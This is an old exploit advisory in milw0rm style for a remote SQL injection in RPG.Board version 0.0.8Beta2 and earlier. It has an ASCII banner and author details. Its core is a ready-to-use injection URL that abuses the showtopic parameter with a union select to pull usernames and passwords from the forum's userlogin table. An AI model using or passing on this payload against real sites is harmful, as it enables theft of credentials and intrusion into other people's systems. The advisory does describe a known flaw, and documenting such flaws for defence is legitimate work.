_____ ____ _____ ____ _____ __ __ _____ ____
/ _ \ /\ /\ / _ \ / _ \ / ___| / _ \ / \/ \ / _ \ / _ |
| | | | \ \/ / ||_| | | | | | | | | | | | | \__/ | | |_| | ||_|_|
| | | | \ / \__ | | | | | | | | | | | | | | | | _ | | \
| |_| | / \ __| | | |_| |/\| |__ | |_| | | | | |/\| | | | | |\ \
\_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_| |_|\/|_| |_| |_| \_|
\/ \/
[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: RPG.Board
[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69
[~] Vulnerability Class: SQL Injection
[~] Exploit:
Register, login and testing exploit..
http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin
# milw0rm.com [2008-09-26]